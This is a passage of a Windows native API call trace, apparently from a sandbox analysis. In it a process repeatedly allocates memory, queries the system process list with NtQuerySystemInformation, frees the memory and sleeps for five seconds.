SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.665] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.671] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.678] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.684] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.691] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.728] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.741] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.763] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.769] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.820] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.829] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 